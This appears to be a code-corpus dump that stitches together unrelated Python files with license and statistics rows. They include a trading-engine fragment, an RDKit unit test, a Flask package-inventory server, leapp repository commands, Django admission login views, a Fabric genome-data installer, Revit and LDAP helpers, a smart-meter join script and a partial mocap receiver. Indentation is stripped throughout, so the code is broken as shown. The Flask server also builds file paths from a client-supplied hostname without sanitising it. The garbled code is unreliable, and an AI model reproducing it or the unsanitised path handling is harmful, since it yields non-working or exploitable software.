"""Start Shell Setup"""
global friar_tuck
friar_tuck = FriarTuckLive(config=config,
data_frequency=data_frequency)
trading_algo.friar_tuck = friar_tuck
trading_algo.lookup_security = lookup_security
trading_algo.get_order = get_order
trading_algo.get_last_filled_buy_order = get_last_filled_buy_order
trading_algo.get_last_filled_sell_order = get_last_filled_sell_order
trading_algo.get_last_filled_orders_by_side = get_last_filled_orders_by_side
trading_algo.get_open_orders = get_open_orders
trading_algo.cancel_order = cancel_order
trading_algo.order_shares = order_shares
trading_algo.order_value = order_value
trading_algo.get_datetime = get_datetime
friar_tuck.set_active_algo(trading_algo)
friar_tuck.run_engine()
"""End Shell Setup"""
if __name__ == "__main__":
# if len(sys.argv) <= 2:
# exit("Too less arguments calling script")
start_engine(sys.argv[1:])
while 1:
# log.info("Alive and well: %s" % datetime.datetime.now())
time.sleep(60)
friar_tuck.stop_engine()
time.sleep(1)
| mit | 4,185,251,554,969,019,400 | 31.408284 | 102 | 0.708782 | false |
adalke/rdkit | rdkit/Dbase/UnitTestDbUtils.py | 1 | 4157 | # $Id$
#
# Copyright (C) 2002-2006 greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
"""unit testing code for the database utilities
"""
from rdkit import RDConfig
import unittest,os,tempfile
from rdkit.Dbase import DbUtils
from rdkit.Dbase.DbConnection import DbConnect
class TestCase(unittest.TestCase):
def setUp(self):
#print '\n%s: '%self.shortDescription(),
self.baseDir = os.path.join(RDConfig.RDCodeDir,'Dbase','test_data')
self.dbName = RDConfig.RDTestDatabase
if RDConfig.useSqlLite:
tmpf,tempName = tempfile.mkstemp(suffix='sqlt')
self.tempDbName = tempName
else:
self.tempDbName='::RDTests'
self.colHeads=('int_col','floatCol','strCol')
self.colTypes=('integer','float','string')
def tearDown(self):
if RDConfig.useSqlLite and os.path.exists(self.tempDbName):
try:
os.unlink(self.tempDbName)
except:
import traceback
traceback.print_exc()
def _confirm(self,tblName,dbName=None):
if dbName is None: dbName = self.dbName
conn = DbConnect(dbName,tblName)
res = conn.GetColumnNamesAndTypes()
assert len(res)==len(self.colHeads),'bad number of columns'
names = [x[0] for x in res]
for i in range(len(names)):
assert names[i].upper()==self.colHeads[i].upper(),'bad column head'
if RDConfig.useSqlLite:
# doesn't seem to be any column type info available
return
types = [x[1] for x in res]
for i in range(len(types)):
assert types[i]==self.colTypes[i],'bad column type'
def test1Txt(self):
""" test reading from a text file """
with open(os.path.join(self.baseDir,'dbtest.csv'),'r') as inF:
tblName = 'fromtext'
DbUtils.TextFileToDatabase(self.tempDbName,tblName,inF)
self._confirm(tblName,dbName=self.tempDbName)
def test3Txt(self):
""" test reading from a text file including null markers"""
with open(os.path.join(self.baseDir,'dbtest.nulls.csv'),'r') as inF:
tblName = 'fromtext2'
DbUtils.TextFileToDatabase(self.tempDbName,tblName,inF,nullMarker='NA')
self._confirm(tblName,dbName=self.tempDbName)
def testGetData1(self):
""" basic functionality
"""
d = DbUtils.GetData(self.dbName,'ten_elements',forceList=1)
assert len(d)==10
assert tuple(d[0])==(0,11)
assert tuple(d[2])==(4,31)
with self.assertRaisesRegexp(IndexError, ""):
d[11]
def testGetData2(self):
""" using a RandomAccessDbResultSet
"""
d = DbUtils.GetData(self.dbName,'ten_elements',forceList=0,randomAccess=1)
assert tuple(d[0])==(0,11)
assert tuple(d[2])==(4,31)
assert len(d)==10
with self.assertRaisesRegexp(IndexError, ""):
d[11]
def testGetData3(self):
""" using a DbResultSet
"""
d = DbUtils.GetData(self.dbName,'ten_elements',forceList=0,randomAccess=0)
with self.assertRaisesRegexp(TypeError, ""):
len(d)
rs = []
for thing in d:
rs.append(thing)
assert len(rs)==10
assert tuple(rs[0])==(0,11)
assert tuple(rs[2])==(4,31)
def testGetData4(self):
""" using a RandomAccessDbResultSet with a Transform
"""
fn = lambda x:(x[0],x[1]*2)
d = DbUtils.GetData(self.dbName,'ten_elements',forceList=0,randomAccess=1,
transform=fn)
assert tuple(d[0])==(0,22)
assert tuple(d[2])==(4,62)
assert len(d)==10
with self.assertRaisesRegexp(IndexError, ""):
d[11]
def testGetData5(self):
""" using a DbResultSet with a Transform
"""
fn = lambda x:(x[0],x[1]*2)
d = DbUtils.GetData(self.dbName,'ten_elements',forceList=0,randomAccess=0,
transform=fn)
with self.assertRaisesRegexp(TypeError, ""):
len(d)
rs = []
for thing in d:
rs.append(thing)
assert len(rs)==10
assert tuple(rs[0])==(0,22)
assert tuple(rs[2])==(4,62)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 924,426,392,574,821,400 | 29.343066 | 78 | 0.639163 | false |
slugbucket/package-inventory-server | python/PackageInventoryServer.py | 1 | 1237 | #!/usr/bin/env python
#
# Run the server with
# $ export FLASK_APP=PackageInventoryServer.py
# $ flask run --host=0.0.0.0
#
from flask import Flask, abort, request
import os.path
app = Flask(__name__)
#
# Based on http://flask.pocoo.org/docs/0.11/quickstart/#routing
#
@app.route('/package-inventory/<hostname>', methods=["GET"])
def get_inventory_package(hostname):
fn = "cache/%s" % hostname
if os.path.isfile(fn):
fh = open(fn ,"r")
return( fh.read() )
else:
abort(404)
@app.route('/package-inventory/packages/new', methods=["POST"])
def post_inventory_package():
if validate_input(request) == False:
abort(400)
jdata = request.get_json()
if (jdata['hostname'] != None):
hostname = jdata['hostname']
else:
hostname = request.host
fn = "cache/%s" % hostname
fh = open(fn ,"w")
if fh.write( str(request.data, 'utf-8') ):
st = "{\"status\":\"Received packages for %s.\"}" % hostname
return ( st )
else:
abort(400)
# Method to check that the input data matches expectations
def validate_input(request):
if( request.is_json == False ):
return False
return 1
if __name__ == "__main__":
app.run()
| apache-2.0 | -1,550,531,850,034,835,200 | 24.244898 | 68 | 0.602264 | false |
leapp-to/prototype | leapp/snactor/commands/repo/__init__.py | 1 | 8710 | from __future__ import print_function
import json
import os
import subprocess
import sys
from leapp.utils.clicmd import command, command_opt, command_arg
from leapp.utils.repository import requires_repository, find_repository_basedir, get_repository_name, \
get_repository_id, add_repository_link, get_user_config_repos, get_user_config_repo_data, \
get_global_repositories_data
from leapp.exceptions import CommandError, UsageError
_MAIN_LONG_DESCRIPTION = '''
This group of commands are around managing repositories.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@command('repo', help='Repository related commands', description=_MAIN_LONG_DESCRIPTION)
def repo(args): # noqa; pylint: disable=unused-argument
pass
_HEALTH_CHECK_LONG_DESCRIPTION = '''
Health check is used to remove stale repository entries from the user local repository registration.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('health-check', help='Checks registered repositories and removes missing entries',
description=_HEALTH_CHECK_LONG_DESCRIPTION)
def health_check(args): # noqa; pylint: disable=unused-argument
to_remove = []
data = get_user_config_repo_data()
if not data:
return
for uuid, path in data.get('repos', {}).items():
if not os.path.isdir(path):
print('Removing repository {uuid} => {path}'.format(uuid=uuid, path=path))
to_remove.append(uuid)
for uuid in to_remove:
data.get('repos', {}).pop(uuid, None)
with open(get_user_config_repos(), 'w') as f:
json.dump(data, f)
_LIST_LONG_DESCRIPTION = '''
Lists repositories on the system. By default it will list all registered user repositories.
It also can list global repositories on the system which usually reside in /usr/share/leapp-repository/
by using the --global commandline flag.
When using the --all commandline flag, all repositories user and globally are listed.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('list', help='Lists repositories', description=_LIST_LONG_DESCRIPTION)
@command_opt('global', is_flag=True, help='List globally available repositories only.')
@command_opt('all', is_flag=True, help='List all available user and global repositories.')
def list_repos(args):
global_repos = {}
if getattr(args, 'global', None) or args.all:
global_repos = get_global_repositories_data()
for entry in global_repos.values():
print('{name:<35} [{uuid}] => {path}'.format(name=entry['name'], path=entry['path'], uuid=entry['id']))
if not getattr(args, 'global', None):
user_repos = get_user_config_repo_data()
for path in user_repos.get('repos', {}).values():
if os.path.isdir(path):
name = get_repository_name(path)
uuid = get_repository_id(path)
print('{name:<35} [{uuid}] => {path}'.format(name=name, path=path, uuid=uuid))
def register_path(path):
"""
Calling this function will register a path to be a well
:param path: Path to the repository repository
:return:
"""
path = os.path.abspath(os.path.realpath(path))
data = {}
repos = get_user_config_repos()
if os.path.isfile(repos):
with open(repos) as f:
data = json.load(f)
data.setdefault('repos', {}).update({get_repository_id(path): path})
with open(repos, 'w') as f:
json.dump(data, f)
_REGISTER_LONG_DESCRIPTION = '''
Registers the current user repository in the users repository registry.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('register', help='Registers the current repository in the user repository registry.',
description=_REGISTER_LONG_DESCRIPTION)
@requires_repository
def register_repo(args): # noqa; pylint: disable=unused-argument
base_dir = find_repository_basedir('.')
if base_dir:
register_path(base_dir)
print('Repository successfully registered')
_LINK_LONG_DESCRIPTION = '''
Links a given repository to the current repository.
Linking a repository is needed, when the current repository requires things like
Tags, Models, Topics, Workflows etc from another repository and needs to be executable
with `snactor`. Snactor does not know otherwise that it will need to load the content
from another repository. Linking the repositories will make snactor load the items
from the linked repositories.
Repositories can be linked by path, name and repository id.
When using the repository name, beware that the first matching name will be linked.
Therefore it's recommended to rather link repositories by path or repository id.
Usage:
$ snactor repo link --path ../../other-repository
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('link', help='Links a given repository to the current one', description=_LINK_LONG_DESCRIPTION)
@command_opt('path', help='Path to the repository to link')
@command_opt('name', help='Name of the repository to link')
@command_opt('uuid', help='UUID of the repository to link', )
@requires_repository
def link_repo(args):
if not any((args.path, args.name, args.uuid)):
raise UsageError('Please specify either --path, --name or --uuid to link another repository.')
data = get_user_config_repo_data()
path = args.path
if not path:
if args.uuid:
path = data.get('repos', {}).get(args.uuid, None)
elif args.name:
for repository_path in data.get('repos', {}).values():
if os.path.isdir(repository_path):
if args.name == get_repository_name(repository_path):
path = repository_path
break
if not path:
raise UsageError('Please specify a valid repository name, uuid or path')
if add_repository_link('.', get_repository_id(path)):
print('Added link to repository {path} - {name}'.format(path=path, name=get_repository_name(path)))
_FIND_LONG_DESCRIPTION = '''
Searches for all repositories and registers them.
When not specifying --path - It will search from the current working directory for existing
leapp repositories and registers all found repositories with the users repository registration.
By using --skip-registration it can be used to just detect repositories without registering them.
If another path should be scanned than the current working directory pass the --path flag.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('find', help='Find and registers all repositories')
@command_opt('skip-registration', is_flag=True, help='Do not register discovered repositories.')
@command_opt('path', help='Path to scan from - If not specified the current working directory is assumed')
def find_repositories(args):
path = args.path or os.path.realpath('.')
result = subprocess.check_output(['/usr/bin/find', '-L', path, '-name', '.leapp']).decode('utf-8')
for repository in result.split('\n'):
if repository.strip():
repository = os.path.dirname(repository)
if not args.skip_registration:
print('Registering {path}'.format(path=repository))
register_path(repository)
else:
print(repository)
_REPOSITORY_CONFIG = '''
[repositories]
repo_path=${repository:root_dir}
[database]
path=${repository:state_dir}/leapp.db
'''
_LONG_DESCRIPTION = '''
Creates a new local repository for writing Actors, Models, Tags,
Topics, and Workflows or adding shared files, tools or libraries.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('new', help='Creates a new repository', description=_LONG_DESCRIPTION)
@command_arg('name')
def new_repository(args):
name = args.name
basedir = os.path.join('.', name)
if os.path.isdir(basedir):
raise CommandError("Directory already exists: {}".format(basedir))
os.mkdir(basedir)
repository_dir = os.path.join(basedir, '.leapp')
os.mkdir(repository_dir)
with open(os.path.join(repository_dir, 'info'), 'w') as f:
json.dump({
'name': name
}, f)
with open(os.path.join(repository_dir, 'leapp.conf'), 'w') as f:
f.write(_REPOSITORY_CONFIG)
register_path(basedir)
sys.stdout.write("New repository {} has been created in {}\n".format(name, os.path.realpath(name)))
| lgpl-2.1 | 6,380,800,431,282,541,000 | 36.381974 | 111 | 0.691848 | false |
007gzs/django_restframework_apiview | apiview/code.py | 1 | 1380 | # encoding: utf-8
from __future__ import absolute_import, unicode_literals
class CodeData(object):
def __init__(self, code, tag, message):
self.code = code
self.message = message
self.tag = tag
def __str__(self):
return str(self.code)
def __eq__(self, other):
if isinstance(other, CodeData):
return other.code == self.code
elif isinstance(other, type(self.code)):
return other == self.code
else:
return super(CodeData, self).__eq__(other)
def get_res_dict(self, **kwargs):
ret = dict(kwargs)
ret['code'] = self.code
if 'message' not in ret:
ret['message'] = self.message
return ret
class Code(object):
def __init__(self, code_define):
codes = set()
self._list = list()
self._dict = dict()
self._tags = list()
for tag, code, message in code_define:
assert code not in codes and not hasattr(self, tag)
setattr(self, tag, CodeData(code, tag, message))
codes.add(code)
self._tags.append(tag)
self._list.append((code, message))
self._dict[code] = message
def get_list(self):
return self._list
def get_dict(self):
return self._dict
def get_tags(self):
return self._tags
| lgpl-3.0 | -7,000,125,340,502,342,000 | 25.037736 | 63 | 0.546377 | false |
jittat/ku-eng-direct-admission | application/views/account.py | 1 | 13340 | # -*- coding: utf-8 -*-
from django.http import HttpResponseRedirect, HttpResponseForbidden
from django.shortcuts import render_to_response, get_object_or_404
from django.core.urlresolvers import reverse
from django.conf import settings
from django import forms
from MySQLdb import IntegrityError
from commons.utils import redirect_to_index, submission_deadline_passed
from application.views import redirect_to_first_form
from application.views import redirect_to_applicant_first_page
from application.models import Applicant
from application.models import SubmissionInfo
from application.models import Registration
from application.forms import LoginForm, ForgetPasswordForm
from application.forms import RegistrationForm, ActivationNameForm
from commons.email import send_password_by_email, send_activation_by_email
from commons.models import Announcement
from commons.decorators import within_submission_deadline
ALLOWED_LOGOUT_REDIRECTION = ['http://admission.eng.ku.ac.th']
def login(request):
announcements = Announcement.get_all_enabled_annoucements()
if not settings.LOGIN_ENABLED:
# login disabled
if request.method == 'POST':
return HttpResponseForbidden()
else:
return render_to_response('application/wait.html',
{ 'announcements': announcements })
error_messages = []
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
passwd = form.cleaned_data['password']
national_id = form.cleaned_data['national_id']
applicants = list(Applicant.objects.filter(national_id=national_id).all())
if len(applicants)!=0:
applicant = applicants[0]
else:
applicant = None
if applicant!=None:
if applicant.activation_required:
email = applicant.email
return render_to_response(
'application/registration/activation-required.html',
{ 'email': email })
elif applicant.check_password(passwd):
# authenticated
if not applicant.has_logged_in:
applicant.has_logged_in = True
applicant.save()
request.session['applicant_id'] = applicant.id
return redirect_to_applicant_first_page(applicant)
from django.forms.util import ErrorList
form._errors['password'] = ErrorList(['รหัสผ่านผิดพลาด'])
error_messages.append('รหัสผ่านผิดพลาด')
else:
form = LoginForm()
return render_to_response('application/start.html',
{ 'form': form,
'submission_deadline_passed':
submission_deadline_passed(),
'errors': error_messages,
'announcements': announcements })
def logout(request):
next_url = None
if 'url' in request.GET:
next_url = request.GET['url']
if next_url[0]!='/':
next_url = 'http://' + next_url
request.session.flush()
if next_url and (next_url in ALLOWED_LOGOUT_REDIRECTION):
return HttpResponseRedirect(next_url)
else:
return redirect_to_index(request)
def duplicate_email_error(applicant, email, first_name, last_name):
# query set is lazy, so we have to force it, using list().
old_registrations = list(applicant.registrations.all())
new_registration = Registration(applicant=applicant,
first_name=first_name,
last_name=last_name)
new_registration.random_and_save()
send_activation_by_email(applicant, new_registration.activation_key)
applicant.activation_required = True
applicant.save()
return render_to_response('application/registration/duplicate.html',
{ 'applicant': applicant,
'email': email,
'old_registrations': old_registrations,
'new_registration': new_registration,
'step_name': "อีเมล์นี้มีการลงทะเบียนไว้แล้ว ต้องมีการยืนยันอีเมล์" })
def validate_email_and_national_id(email, national_id):
applicant = Applicant.get_applicant_by_national_id(national_id)
if applicant!=None:
return (False, 'national_id', applicant)
else:
applicant = Applicant.get_applicant_by_email(email)
if applicant!=None:
return (False, 'email', applicant)
else:
return (True, None, None)
def registration_error(error_field,
applicant, email, national_id, first_name, last_name):
if error_field == 'email':
return duplicate_email_error(applicant,
email,
first_name,
last_name)
else:
return render_to_response(
'application/registration/duplicate-nat-id-error.html',
{ 'national_id': national_id,
'step_name': u'เกิดปัญหาในการลงทะเบียน เนื่องจากมีการใช้รหัสประจำตัวประชาชนซ้ำ'})
@within_submission_deadline
def register(request):
if request.method == 'POST':
if 'cancel' in request.POST:
return redirect_to_index(request)
form = RegistrationForm(request.POST)
if form.is_valid():
email = form.cleaned_data['email']
first_name=form.cleaned_data['first_name']
last_name=form.cleaned_data['last_name']
national_id=form.cleaned_data['national_id']
result, error_field, applicant = (
validate_email_and_national_id(email,
national_id))
if result:
try:
applicant = form.get_applicant()
passwd = applicant.random_password()
applicant.save()
except IntegrityError:
# somehow, it gets error
result, error_field, applicant = (
validate_email_and_national_id(email,
national_id))
return registration_error(error_field,
applicant,
email,
national_id,
first_name,
last_name)
registration = Registration(
applicant=applicant,
first_name=first_name,
last_name=last_name)
registration.random_and_save()
send_password_by_email(applicant, passwd)
return render_to_response(
'application/registration/success.html',
{'email': form.cleaned_data['email'],
'step_name': "การลงทะเบียนเรียบร้อย" })
else:
if not applicant.has_logged_in:
return registration_error(error_field,
applicant,
email,
national_id,
first_name,
last_name)
# e-mail or national id has been registered and logged in
from django.forms.util import ErrorList
from commons.utils import admin_email
if error_field == 'email':
dup_obj = u'อีเมล์'
else:
dup_obj = u'รหัสประจำตัวประชาชน'
form._errors['__all__'] = ErrorList([
u"""%(dup_obj)sนี้ถูกลงทะเบียนและถูกใช้แล้ว ถ้าอีเมล์นี้เป็นของคุณจริงและยังไม่เคยลงทะเบียน
กรุณาติดต่อผู้ดูแลระบบทางอีเมล์ <a href="mailto:%(email)s">%(email)s</a> หรือทางเว็บบอร์ด
อาจมีผู้ไม่ประสงค์ดีนำอีเมล์คุณไปใช้""" % {'dup_obj': dup_obj,
'email': admin_email()}])
else:
form = RegistrationForm()
return render_to_response('application/registration/register.html',
{ 'form': form })
@within_submission_deadline
def activate(request, activation_key):
try:
registration = Registration.objects.get(activation_key=activation_key)
except Registration.DoesNotExist:
return render_to_response(
'application/registration/activation-not-required.html',
{'step_name': "ไม่จำเป็นต้องมีการยืนยันอีเมล์"})
applicant = registration.applicant
if not applicant.activation_required:
return render_to_response(
'application/registration/activation-not-required.html',
{'step_name': "ไม่จำเป็นต้องมีการยืนยันอีเมล์"})
if not applicant.verify_activation_key(activation_key):
return render_to_response(
'application/registration/incorrect-activation-key.html',
{'applicant': applicant,
'step_name': "รหัสยืนยันผิดพลาด" })
if request.method == 'GET':
# get a click from e-mail
name_form = ActivationNameForm(initial={
'title': applicant.title,
'first_name': applicant.first_name,
'last_name': applicant.last_name})
else:
name_form = ActivationNameForm(request.POST)
if name_form.is_valid():
applicant.activation_required = False
applicant.title = name_form.cleaned_data['title']
applicant.first_name = name_form.cleaned_data['first_name']
applicant.last_name = name_form.cleaned_data['last_name']
passwd = applicant.random_password()
applicant.save()
registration = Registration(
applicant=applicant,
first_name=applicant.first_name,
last_name=applicant.last_name)
registration.random_and_save()
send_password_by_email(applicant, passwd)
return render_to_response(
'application/registration/activation-successful.html',
{'applicant': applicant})
return render_to_response(
'application/registration/activation-name-confirmation.html',
{'applicant': applicant,
'form': name_form,
'activation_key': activation_key,
'no_first_page_link': True,
'step_name': "การยืนยันอีเมล์ - รหัสสำหรับยืนยันถูกต้อง" })
def forget_password(request):
if request.method == 'POST':
form = ForgetPasswordForm(request.POST)
if form.is_valid():
email = form.cleaned_data['email']['email']
applicant = form.cleaned_data['email']['applicant']
if applicant.can_request_password():
if applicant.activation_required:
return duplicate_email_error(applicant,
email,
applicant.first_name,
applicant.last_name)
new_pwd = applicant.random_password()
applicant.save()
send_password_by_email(applicant, new_pwd)
return render_to_response(
'application/registration/password-sent.html',
{'email': email,
'step_name': "ส่งรหัสผ่านให้แล้ว"})
else:
return render_to_response(
'application/registration/too-many-requests.html',
{'email': email,
'step_name': "ขอรหัสผ่านบ่อยครั้งเกินไป"})
else:
form = ForgetPasswordForm()
return render_to_response('application/forget.html',
{ 'form': form })
| agpl-3.0 | -2,274,095,997,374,761,200 | 40.1 | 102 | 0.537064 | false |
chapmanb/cloudbiolinux | data_fabfile.py | 1 | 3179 | """Fabric deployment file to install genomic data on remote instances.
Designed to automatically download and manage biologically associated
data on cloud instances like Amazon EC2.
Fabric (http://docs.fabfile.org) manages automation of remote servers.
Usage:
fab -i key_file -H servername -f data_fabfile.py install_data
"""
import os
import sys
from fabric.main import load_settings
from fabric.api import *
from fabric.contrib.files import *
from fabric.context_managers import path
try:
import boto
except ImportError:
boto = None
# preferentially use local cloudbio directory
for to_remove in [p for p in sys.path if p.find("cloudbiolinux-") > 0]:
sys.path.remove(to_remove)
sys.path.append(os.path.dirname(__file__))
from cloudbio.utils import _setup_logging, _configure_fabric_environment
from cloudbio.biodata import genomes
# -- Host specific setup
env.remove_old_genomes = False
def setup_environment():
"""Setup environment with required data file locations.
"""
_setup_logging(env)
_add_defaults()
_configure_fabric_environment(env, ignore_distcheck=True)
def _add_defaults():
"""Defaults from fabricrc.txt file; loaded if not specified at commandline.
"""
env.config_dir = os.path.join(os.path.dirname(__file__), "config")
conf_file = "tool_data_table_conf.xml"
env.tool_data_table_conf_file = os.path.join(os.path.dirname(__file__),
"installed_files", conf_file)
if not env.has_key("distribution"):
config_file = os.path.join(env.config_dir, "fabricrc.txt")
if os.path.exists(config_file):
env.update(load_settings(config_file))
CONFIG_FILE = os.path.join(os.path.dirname(__file__), "config", "biodata.yaml")
def install_data(config_source=CONFIG_FILE):
"""Main entry point for installing useful biological data.
"""
setup_environment()
genomes.install_data(config_source)
def install_data_raw(config_source=CONFIG_FILE):
"""Installing useful biological data building from scratch. Useful for debugging.
"""
setup_environment()
genomes.install_data(config_source, approaches=["raw"])
def install_data_s3(config_source=CONFIG_FILE, do_setup_environment=True):
"""Install data using pre-existing genomes present on Amazon s3.
"""
setup_environment()
genomes.install_data_s3(config_source)
def install_data_rsync(config_source=CONFIG_FILE):
"""Install data using Galaxy rsync data servers.
"""
setup_environment()
genomes.install_data_rsync(config_source)
def install_data_ggd(recipe, organism):
"""Install data using Get Genomics Data (GGD) recipes.
"""
setup_environment()
from cloudbio.biodata import ggd, genomes
genome_dir = os.path.join(genomes._make_genome_dir(), organism)
recipe_file = os.path.join(os.path.dirname(__file__), "ggd-recipes", organism, "%s.yaml" % recipe)
ggd.install_recipe(genome_dir, env, recipe_file, organism)
def upload_s3(config_source=CONFIG_FILE):
"""Upload prepared genome files by identifier to Amazon s3 buckets.
"""
setup_environment()
genomes.upload_s3(config_source)
| mit | -2,308,734,205,961,331,700 | 33.182796 | 102 | 0.702108 | false |
eirannejad/pyRevit | pyrevitlib/rpw/db/transform.py | 1 | 1871 | """ Transform Wrappers """
import math
import rpw
from rpw import DB
from rpw.base import BaseObjectWrapper
class Transform(BaseObjectWrapper):
"""
`DB.Transform` Wrapper
Attributes:
_revit_object (DB.XYZ): Wrapped ``DB.Transform``
"""
_revit_object_class = DB.Transform
@classmethod
def rotate_vector(cls, vector, rotation, center=None, axis=None, radians=False):
""" Rotate a Vector or point
Usage:
>>> from rpw import db
>>> db.Transform.rotate_vector(SomeVector, 90.0)
Args:
vector (``point-like``): Point like element.
rotation (``float``): Rotation in degrees.
center (``point-like``, optional): Center of rotation [default: 0,0,0]
axis (``point-like``, optional): Axis of rotation [default: 0,0,1]
radians (``bool``, optional): True for rotation angle is in radians [default: False]
Returns:
``point-like``: Rotate Vector
"""
XYZ = rpw.db.XYZ
vector = XYZ(vector)
if radians:
angle_rad = rotation
else:
angle_rad = math.radians(rotation)
axis = XYZ(DB.XYZ(0,0,1)) if not axis else XYZ(axis)
center = XYZ(DB.XYZ(0,0,0)) if not center else XYZ(center)
transform = cls._revit_object_class.CreateRotationAtPoint(
axis.unwrap(),
angle_rad,
center.unwrap())
return XYZ(transform.OfVector(vector.unwrap()))
@classmethod
def move(cls, vector, object):
""" Rotate a Vector by Degrees """
raise NotImplemented
# vector = XYZ(vector)
# transform = cls._revit_object_class.CreateTranslation(vector)
| gpl-3.0 | -1,232,147,447,180,251,000 | 31.824561 | 96 | 0.544094 | false |
Karaage-Cluster/python-tldap | tldap/utils.py | 1 | 1651 | # Copyright 2012-2014 Brian May
#
# This file is part of python-tldap.
#
# python-tldap is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-tldap is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with python-tldap If not, see <http://www.gnu.org/licenses/>.
""" Contains ConnectionHandler which represents a list of connections. """
import sys
from threading import local
DEFAULT_LDAP_ALIAS = "default"
def load_backend(backend_name):
__import__(backend_name)
return sys.modules[backend_name]
class ConnectionHandler(object):
""" Contains a list of known LDAP connections. """
def __init__(self, databases):
self.databases = databases
self._connections = local()
def __getitem__(self, alias):
if hasattr(self._connections, alias):
return getattr(self._connections, alias)
db = self.databases[alias]
backend = load_backend(db['ENGINE'])
conn = backend.LDAPwrapper(db)
setattr(self._connections, alias, conn)
return conn
def __iter__(self):
return iter(self.databases)
def all(self):
""" Return list of all connections. """
return [self[alias] for alias in self]
| gpl-3.0 | -3,364,013,351,599,750,000 | 29.018182 | 74 | 0.688674 | false |
katsumin/HomeRpi | bp35c0_join2.py | 1 | 1963 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
sys.path.append("/home/pi/HomeRpi")
import serial
import time
import ConfigParser
iniFile = ConfigParser.SafeConfigParser()
iniFile.read('./config.ini')
args = sys.argv
# シリアルポート初期化
serialPortDev = iniFile.get('smartmeter', 'serial_port')
baudRate = iniFile.get('smartmeter', 'serial_bps')
ser = serial.Serial(serialPortDev, int(baudRate))
# 関数
def waitOk() :
while True :
line = ser.readline()
print(line, end="")
if line.startswith("OK") :
break
# コマンド送信
while True :
ser.write("SKVER\r\n")
line = ser.readline()
if line.startswith("OK") :
break
#pwd = args[1]
pwd = iniFile.get('smartmeter', 'pwd')
ser.write("SKSETPWD C {0}\r\n".format(pwd))
waitOk()
#bid = args[2]
bid = iniFile.get('smartmeter', 'bid')
ser.write("SKSETRBID {0}\r\n".format(bid))
waitOk()
scanRes = {}
ser.write("SKSCAN 2 FFFFFFFF 6 0\r\n")
while True :
line = ser.readline()
print(line, end="")
if line.startswith("EVENT 22") :
break
elif line.startswith(" ") :
cols = line.strip().split(':')
scanRes[cols[0]] = cols[1]
ser.write("SKSREG S2 " + scanRes["Channel"] + "\r\n")
waitOk()
ser.write("SKSREG S3 " + scanRes["Pan ID"] + "\r\n")
waitOk()
ser.write("SKLL64 " + scanRes["Addr"] + "\r\n")
while True :
line = ser.readline()
print(line, end="")
if not line.startswith("SKLL64") :
ipv6Addr = line.strip()
break
print(ipv6Addr)
iniFile.set('smartmeter','address',ipv6Addr)
fp=open('./config.ini','w')
iniFile.write(fp)
fp.close()
#ipv6Addr = "FE80:0000:0000:0000:021C:6400:03CE:BD79"
command = "SKJOIN {0}\r\n".format(ipv6Addr)
ser.write(command)
while True:
line = ser.readline()
print(line, end="")
if line.startswith("EVENT 24") :
break
elif line.startswith("EVENT 25") :
break
| mit | -3,208,476,356,250,593,000 | 20.897727 | 56 | 0.622211 | false |
cmuphyscomp/hmv-s16 | Grasshopper/MocapDemo/optirecv.py | 1 | 7577 | # optirecv.py : motion capture data receiver for use within Grasshopper ghpython objects
# Copyright (c) 2016, Garth Zeglin. All rights reserved. Licensed under the
# terms of the BSD 3-clause license.
# use RhinoCommon API
import Rhino
# Make sure that the Python libraries that are also contained within this course
# package are on the load path. This adds the python/ folder to the load path
# *after* the current folder. The path manipulation assumes that this module is
# still located within the Grasshopper/MocapDemo subfolder, and so the package
# modules are at ../../python.
import sys, os
sys.path.insert(1, os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))), "python"))
# import the Optitrack stream decoder
import optirx
# import a quaternion conversion function
from optitrack.geometry import quaternion_to_xaxis_yaxis
# load the Grasshopper utility functions from the course packages
from ghutil import *
# share the mocap coordinate conversion code with the CSV loader
from optiload import rotated_point, rotated_orientation, plane_or_null
#================================================================
class OptitrackReceiver(object):
def __init__(self, version_string, ip_address=None):
# The version string should be of the form "2900" and should match the SDK version of the Motive software.
# E.g. Motive 1.9 == SDK 2.9.0.0 == "2900"
# Motive 1.8 == SDK 2.8.0.0 == "2800"
self.sdk_version = tuple(map(int,version_string)) # e.g. result is (2,9,0,0)
# create a multicast UDP receiver socket
self.receiver = optirx.mkdatasock(ip_address=ip_address)
# set non-blocking mode so the socket can be polled
self.receiver.setblocking(0)
# Keep track of the most recent results. These are stored as normal Python list structures, but
# already rotated into Rhino coordinate conventions.
self.positions = list() # list of Point3d objects
self.rotations = list() # list of [x,y,z,w] quaternions as Python list of numbers
self.bodynames = list() # list of name strings associated with the bodies
return
#================================================================
def make_plane_list(self):
"""Return the received rigid body frames as a list of Plane or None (for missing data), one entry per rigid body stream."""
# convert each quaternion into a pair of X,Y basis vectors
basis_vectors = [quaternion_to_xaxis_yaxis(rot) for rot in self.rotations]
# Extract the X and Y axis basis elements into lists of Vector3d objects.
xaxes = [Rhino.Geometry.Vector3d(*(basis[0])) for basis in basis_vectors]
yaxes = [Rhino.Geometry.Vector3d(*(basis[1])) for basis in basis_vectors]
# Generate either Plane or None for each coordinate frame.
planes = [plane_or_null(origin, x, y) for origin,x,y in zip(self.positions, xaxes, yaxes)]
return planes
#================================================================
def _markers_coincide(self, m1, m2):
"""For now, an exact match (could be fuzzy match)."""
return m1[0] == m2[0] and m1[1] == m2[1] and m1[2] == m2[2]
